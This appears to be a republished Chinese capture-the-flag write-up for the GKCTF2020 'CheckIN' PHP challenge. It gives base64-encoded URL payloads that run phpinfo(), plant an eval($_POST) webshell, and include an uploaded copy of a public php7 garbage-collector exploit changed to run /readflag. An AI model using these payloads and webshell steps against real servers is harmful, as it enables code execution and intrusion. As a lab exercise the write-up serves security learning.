标签：tmp Writeup CheckIN base64 readflag Ginkgo GKCTF2020 php 上传

打开实例是一段PHP代码。

通过代码没有发现反序列化函数，但是可以通过Ginkgo传参，但必须要传经过base64编码后的。上传phpinfo();试试，顺便看看php版本，将**phpinfo();**经base64编码后上传。

payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==

如下图

上传个一句话木马试试,将**eval($_POST[a]);**经base64编码后上传

payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1BPU1RbYV0pOw==

使用蚁剑连接试试

连接成功后，查看根目录

发现有flag文件，但权限不够看不了。readflag打开后乱码，于是想到执行readflag获取flag内容。但怎么执行呢，我也不会了，看wp后知道。php版本为7.3，这个版本有一个漏洞，php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令影响范围是linux，php7.0-7.3给出了exp
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php下载后进行修改，改为pwn("/readflag");，注意我这里将exploits.php文件改名为了111.php

上传挨个试，发现tmp可以上传，于是就上传到tmp中。进入tmp目录中，右键，然后点上传。上传成功后，执行文件包含。将include('/tmp/111.php');经base64编码后上传。

payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=aW5jbHVkZSgnL3RtcC8xMTEucGhwJyk7

得出flag

这题难就难在那个执行readflag，以后要注意不同php版本的漏洞。

标签：tmp,Writeup,CheckIN,base64,readflag,Ginkgo,GKCTF2020,php,上传
来源： https://blog.csdn.net/qq_45619909/article/details/115598299

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。